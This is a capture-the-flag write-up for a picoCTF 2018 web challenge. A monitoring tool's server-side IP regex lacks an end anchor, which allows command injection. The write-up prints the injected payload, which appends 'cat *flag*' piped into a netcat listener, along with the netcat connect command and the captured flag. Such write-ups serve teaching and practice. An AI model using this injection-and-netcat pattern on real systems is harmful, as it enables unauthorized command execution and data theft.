Points: 400
Web Exploitation
One of my school mate developed an alive monitoring tool. Can you get a flag from http://2018shell1.picoctf.com:31070 (link)?
This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.
You should be able to listen through the shell on the server.
Looking at the php source code, we can see that the regex on the server side is missing a $ at the back. This means that we can append any shell command after the IP Address.
There's also client side Javascript, but we can circumvent it using Python.
All we have to do is to append a listener using netcat and get the flag. In this case, I set the port to 54433. Pipe the command cat *flag* to receive the flag.
Exploit: 8.8.8.8; cat *flag* | nc -lp 54433. 8.8.8.8 is used because that's the IP of Google's DNS. I used it just to speed up the process.
Finally, we connect to the server using netcat and get the flag. nc 2018shell1.picoctf.com 54433.
Working solution solve.py
picoCTF{n3v3r_trust_a_b0x_91345b04}